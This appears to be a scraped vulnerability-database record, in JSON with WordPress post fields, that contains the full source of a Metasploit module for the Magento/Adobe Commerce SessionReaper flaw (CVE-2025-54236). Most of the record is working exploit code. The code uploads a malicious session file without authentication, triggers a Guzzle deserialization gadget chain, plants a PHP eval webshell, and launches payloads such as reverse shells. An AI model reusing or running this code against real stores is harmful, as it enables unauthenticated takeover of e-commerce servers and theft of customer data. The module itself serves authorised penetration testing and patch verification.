{“lastseen”:”2025-12-10T19:05:06″,”description”:”This module exploits CVE-2025-54236 SessionReaper, a critical vulnerability in Magento\/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested deserialization in the payment method…”,”published”:”2025-12-10T18:57:29″,”modified”:”2025-12-10T18:57:29″,”type”:”metasploit”,”title”:”Magento SessionReaper”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-MAGENTO_SESSIONREAPER-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-54236″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Payload::Php\\n include Msf::Exploit::FileDropper\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Magento SessionReaper’,\\n ‘Description’ =\\u003e %q{\\n This module exploits CVE-2025-54236 (SessionReaper), a critical vulnerability in\\n Magento\/Adobe Commerce that allows unauthenticated remote code execution.\\n\\n The vulnerability stems from improper handling of nested deserialization in the\\n payment method context, combined with an unauthenticated file upload endpoint.\\n\\n The exploit chain consists of three steps:\\n 1. Upload a malicious PHP session file containing a Guzzle\/FW1 deserialization\\n payload via the unauthenticated \/customer\/address_file\/upload endpoint\\n 2. Trigger deserialization by sending a crafted JSON payload to the REST API\\n endpoint \/rest\/default\/V1\/guest-carts\/{cart_id}\/order that modifies the\\n session savePath to point to the uploaded file\\n 3. Execute the uploaded PHP code to gain remote code execution\\n\\n This vulnerability affects Magento 2.x instances configured to use file-based\\n session storage. Patched versions will return a 400 Bad Request response instead\\n of processing the malicious payload.\\n },\\n ‘Author’ =\\u003e [\\n ‘Blaklis’, # Discovery\\n ‘Tomais Williamson’, # Research \\u0026 Analysis\\n ‘Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e’ # Metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-54236’],\\n [‘URL’, ‘https:\/\/slcyber.io\/research-center\/why-nested-deserialization-is-still-harmful-magento-rce-cve-2025-54236\/’],\\n [‘URL’, ‘https:\/\/experienceleague.adobe.com\/en\/docs\/experience-cloud-kcs\/kbarticles\/ka-27397’]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘Platform’ =\\u003e %w[php unix linux win],\\n ‘Arch’ =\\u003e [ARCH_PHP, ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP In-Memory’, {\\n ‘Platform’ =\\u003e ‘php’,\\n ‘Arch’ =\\u003e ARCH_PHP\\n # tested with php\/meterpreter\/reverse_tcp\\n }\\n ],\\n [\\n ‘Unix\/Linux Command Shell’, {\\n ‘Platform’ =\\u003e %w[unix linux],\\n ‘Arch’ =\\u003e ARCH_CMD\\n # tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ],\\n [\\n ‘Windows Command Shell’, {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD\\n # tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-10-22’,\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n end\\n\\n def check_404_response(body)\\n lower = body.to_s.downcase\\n return false unless lower.include?(‘no such entity’)\\n\\n lower.include?(‘cartid’) || (lower.include?(‘fieldname’) \\u0026\\u0026 lower.include?(‘fieldvalue’))\\n end\\n\\n def check_500_response(body)\\n lower = body.to_s.downcase\\n return false if lower.include?(‘500 internal server error’) \\u0026\\u0026 !lower.include?(‘sessionhandler’)\\n\\n lower.include?(‘sessionhandler::read’) ||\\n (lower.include?(‘no such file or directory’) \\u0026\\u0026 lower.include?(‘session’)) ||\\n lower.include?(‘webapi-‘)\\n end\\n\\n def check\\n random_path = Array.new(3) { Rex::Text.rand_text_alphanumeric(4..8) }.join(‘\/’)\\n cart_id = Rex::Text.rand_text_alphanumeric(4..8)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(\\n target_uri.path, ‘rest’, ‘default’, ‘V1’, ‘guest-carts’, cart_id, ‘order’\\n ),\\n ‘method’ =\\u003e ‘PUT’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e { ‘Accept’ =\\u003e ‘application\/json’ },\\n ‘data’ =\\u003e build_deserialization_payload(random_path)\\n })\\n\\n return CheckCode::Unknown(‘No response from target’) unless res\\n\\n case res.code\\n when 400\\n return CheckCode::Safe(‘Target is patched (returns 400 Bad Request)’)\\n when 404\\n return CheckCode::Appears(‘Target returned 404 with expected error pattern’) if check_404_response(res.body)\\n when 500\\n return CheckCode::Appears(‘Target returned 500 error with SessionHandler’) if check_500_response(res.body)\\n end\\n\\n CheckCode::Unknown(\\”Unexpected HTTP status: #{res.code}\\”)\\n end\\n\\n def exploit\\n session_id = Rex::Text.rand_text_hex(32)\\n session_filename = \\”sess_#{session_id}\\”\\n session_save_dir = session_save_dir_from_filename(session_filename)\\n exploit_filename = \\”#{Rex::Text.rand_text_alphanumeric(4..8)}.php\\”\\n post_param = Rex::Text.rand_text_alphanumeric(4..8)\\n\\n vprint_status(‘Generating Guzzle\/FW1 deserialization payload…’)\\n php_stub = \\”\\u003c?php @eval(base64_decode(\\\\$_POST[‘#{post_param}’]));?\\u003e\\”\\n guzzle_payload = build_guzzle_fw1_payload(\\”pub\/#{exploit_filename}\\”, php_stub)\\n\\n vprint_status(‘Uploading session file with Guzzle payload…’)\\n uploaded_path = upload_session_file(session_id, guzzle_payload, Rex::Text.rand_text_alphanumeric(8..12))\\n return unless uploaded_path\\n\\n save_path = \\”media\/customer_address#{File.dirname(uploaded_path)}\\”\\n unless trigger_deserialization(session_id, save_path)\\n fail_with(Failure::Unknown, ‘Failed to trigger deserialization’)\\n end\\n\\n register_file_for_cleanup(exploit_filename.to_s)\\n register_file_for_cleanup(\\”media\/customer_address\/#{session_save_dir}\/#{session_filename}\\”)\\n register_file_for_cleanup(datastore[‘FETCH_FILENAME’].to_s) if target[‘Arch’] == ARCH_CMD \\u0026\\u0026 datastore[‘FETCH_FILENAME’].present?\\n\\n execute_uri = normalize_uri(target_uri.path, ‘pub’, exploit_filename)\\n vprint_status(\\”Executing payload at: #{execute_uri}\\”)\\n\\n phped_payload = target[‘Arch’] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)\\n encoded_payload = Rex::Text.encode_base64(phped_payload)\\n send_request_cgi({\\n ‘uri’ =\\u003e execute_uri,\\n ‘method’ =\\u003e ‘POST’,\\n ‘data’ =\\u003e \\”#{post_param}=#{Rex::Text.uri_encode(encoded_payload)}\\”,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’\\n })\\n end\\n\\n def session_save_dir_from_filename(filename)\\n \\”#{filename[0]}\/#{filename[1]}\\”\\n end\\n\\n def upload_session_file(session_id, content, form_key)\\n filename = \\”sess_#{session_id}\\”\\n vprint_status(\\”Uploading malicious session file: #{filename}\\”)\\n\\n post_data = Rex::MIME::Message.new\\n post_data.add_part(form_key, nil, nil, ‘form-data; name=\\”form_key\\”‘)\\n filename_part = ‘form-data; name=\\”custom_attributes[country_id]\\”; ‘ \\\\\\n \\”filename=\\\\\\”#{filename}\\\\\\”\\”\\n post_data.add_part(content, ‘application\/octet-stream’, nil, filename_part)\\n\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘customer’, ‘address_file’, ‘upload’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{post_data.bound}\\”,\\n ‘cookie’ =\\u003e \\”form_key=#{form_key}\\”,\\n ‘data’ =\\u003e post_data.to_s,\\n ‘keep_cookies’ =\\u003e true\\n })\\n\\n return nil unless res\\u0026.code == 200\\n\\n json_response = res.get_json_document\\n error_msg = json_response\\u0026.dig(‘error’)\\n if error_msg \\u0026\\u0026 error_msg != 0\\n print_error(\\”Upload failed: #{error_msg}\\”)\\n return nil\\n end\\n\\n return json_response[‘file’] if json_response\\u0026.dig(‘file’)\\n\\n \\”\/#{session_save_dir_from_filename(filename)}\/#{filename}\\”\\n end\\n\\n def build_deserialization_payload(save_path)\\n {\\n ‘paymentMethod’ =\\u003e {\\n ‘paymentData’ =\\u003e {\\n ‘context’ =\\u003e {\\n ‘urlBuilder’ =\\u003e {\\n ‘session’ =\\u003e {\\n ‘sessionConfig’ =\\u003e {\\n ‘savePath’ =\\u003e save_path\\n }\\n }\\n }\\n }\\n }\\n }\\n }.to_json\\n end\\n\\n def trigger_deserialization(session_id, save_path)\\n vprint_status(\\”Triggering deserialization with savePath: #{save_path}\\”)\\n\\n cart_id = Rex::Text.rand_text_alphanumeric(4..8)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(\\n target_uri.path, ‘rest’, ‘default’, ‘V1’, ‘guest-carts’, cart_id, ‘order’\\n ),\\n ‘method’ =\\u003e ‘PUT’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e { ‘Accept’ =\\u003e ‘application\/json’ },\\n ‘cookie’ =\\u003e \\”PHPSESSID=#{session_id}\\”,\\n ‘data’ =\\u003e build_deserialization_payload(save_path)\\n })\\n\\n return false unless res\\u0026.code == 404 || res\\u0026.code == 500\\n\\n vprint_good(\\”Deserialization triggered (HTTP #{res.code})\\”)\\n true\\n end\\n\\n # Serialize a string to PHP binary-safe string format (S:)\\n # Characters in printable ASCII range (32-126) except backslash and double quote are kept as-is\\n # Other characters are escaped as \\\\xHH where HH is the hexadecimal byte value\\n def serialize_string_ascii(str)\\n result = str.each_byte.map do |byte|\\n # Keep printable ASCII characters except backslash (92) and double quote (34)\\n next byte.chr if (32..126).cover?(byte) \\u0026\\u0026 byte != 92 \\u0026\\u0026 byte != 34\\n\\n # Escape other characters as \\\\xHH\\n \\”\\\\\\\\#{sprintf(‘%02x’, byte)}\\”\\n end.join\\n # PHP binary-safe string format: S:length:\\”content\\”;\\n \\”S:#{str.length}:\\\\\\”#{result}\\\\\\”;\\”\\n end\\n\\n def build_guzzle_fw1_payload(target_file, php_content)\\n escaped = \\”#{php_content}\\\\n\\”\\n set_cookie_data = \\”a:3:{#{serialize_string_ascii(‘Expires’)}i:1;\\” \\\\\\n \\”#{serialize_string_ascii(‘Discard’)}b:0;\\” \\\\\\n \\”#{serialize_string_ascii(‘Value’)}#{serialize_string_ascii(escaped)}}\\”\\n set_cookie = ‘O:27:\\”GuzzleHttp\\\\\\\\Cookie\\\\\\\\SetCookie\\”:1:’ \\\\\\n \\”{#{serialize_string_ascii(‘data’)}#{set_cookie_data}}\\”\\n cookies_array = \\”a:1:{i:0;#{set_cookie}}\\”\\n file_cookie_jar = ‘O:31:\\”GuzzleHttp\\\\\\\\Cookie\\\\\\\\FileCookieJar\\”:4:’ \\\\\\n \\”{#{serialize_string_ascii(‘cookies’)}#{cookies_array}\\” \\\\\\n \\”#{serialize_string_ascii(‘strictMode’)}N;\\” \\\\\\n \\”#{serialize_string_ascii(‘filename’)}#{serialize_string_ascii(target_file)}\\” \\\\\\n \\”#{serialize_string_ascii(‘storeSessionCookies’)}b:1;}\\”\\n \\”_|#{file_cookie_jar}\\”\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/magento_sessionreaper.rb”,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/magento_sessionreaper\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-10T19:05:06″,”description”:”This module exploits CVE-2025-54236 SessionReaper, a critical vulnerability in Magento\/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,169,13,7,11,5],"class_list":["post-30208","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n